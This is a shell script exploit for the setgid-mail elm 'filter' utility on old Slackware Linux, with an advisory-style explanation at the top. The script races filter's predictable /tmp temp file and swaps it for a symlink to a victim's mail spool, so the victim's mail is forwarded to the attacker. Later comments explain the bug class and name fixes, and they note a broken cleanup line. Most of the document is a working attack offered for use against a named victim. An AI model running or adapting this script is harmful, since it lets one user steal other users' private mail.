#!/bin/sh
#   The elm filter under linux runs sugrp mail, thus allowing it to freely
#read and write from users' mail spools.  It is only through the integrity
#of its code that the security of linux's mail system is protected; and in
#this respect it falls short.  The failure of the filter program to properly
#handle temporary files allows a user to read or write to any user's mail
#spool, a significant security hole.
#   The specific problem that is exploited in this hole is the way filter
#uses a temporary file to store the input to it, and then subsequently send
#it back out according to the filter.  Because of the modularity of the
#coding, in the main filter.c, the temporary file is opened, and then written
#to; after which it is closed.  The mailmessage function is then called, with
#the purpose of forwarding that mail, written to the temporary file, to
#whatever destination is specified in the filter.  At the start of this
#process, the temporary file is opened, and the contents of it are dumped
#to the mail spool of the user the mail is being forwarded to.
#   At any point after the file has been initially opened by the main filter
#function, since the user running filter has permissions on that temp file,
#it can be rm'd.  The temp file existing can then be replaced with a symbolic
#link to any file that group mail has read permissions on.  When it is opened
#in the mailmessage function, the symbolic link is followed and whatever file
#that was pointed to will be read in, and the contents forwarded to the user
#specified in the mail spool.
#
#   The complete exploits are shown below:
#
#                   Program: filter, an elm utility
#Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter
#              Requirements: account on machine
#       Security Compromise: user can read any mail spool readable by grp mail.
#                            (usually everything, sometimes not root)
#                    Author: Dave M. (davem@cmu.edu)
#                  Synopsis: filter writes out the mail to be forwarded to a
#                            temporary file, which is then closed and reopened;
#                            if when the temporary file is reopened it is a
#                            symlink to a mail spool, filter will proceed
#                            to forward the contents of that file as if it were
#                            the original message.
#
# This shell script exploits a problem with filter(1L):
# it will follow symbolic links on a read, allowing
# us to steal a user's mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. (davem@cmu.edu)
#

# --- Preserve and empty the caller's own spool ----------------------------
# Whatever filter forwards lands in $LOGNAME's own spool, so the current
# spool is saved to $HOME and truncated; the saved copy is put back at the end.
cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
# Filter rule file: unconditionally forward to the caller.  Note that every
# scratch file below also uses a fixed, predictable name in the shared /tmp,
# the same weakness the script relies on in filter itself.
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp

# A minimal message for filter to consume (unquoted delimiter, so $LOGNAME
# is expanded inside the heredoc).
cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit

_EOF_

# --- Race the setgid-mail filter on its temporary file ---------------------
# Wrapper that holds filter's stdin for two seconds before feeding it the
# message; that delay is the window in which filter's temporary file is
# swapped for a symlink (time-of-check/time-of-use on a predictable /tmp name).
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
# filter names its temp file /tmp/filter.<pid>, so the PID is recovered by
# scraping ps; the second grep drops the grep process itself.
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
# The temp file is owned by the calling user, so it can be removed and
# replaced with a symlink to the victim's spool; when filter reopens the
# path by name it follows the link.  Hardened code avoids this class of bug
# with mkstemp()/O_EXCL|O_NOFOLLOW, an unshared temp directory, or by keeping
# the original descriptor open instead of reopening by path.
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp
# NOTE(review): this line executes the rule file deleted just above, with
# the symlink path as its argument, rather than removing anything; it looks
# like a truncated cleanup line, so /tmp/filter.<pid> is presumably left
# behind in /tmp as an artifact.
/tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
# --- Collect the forwarded contents and restore the real spool -------------
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail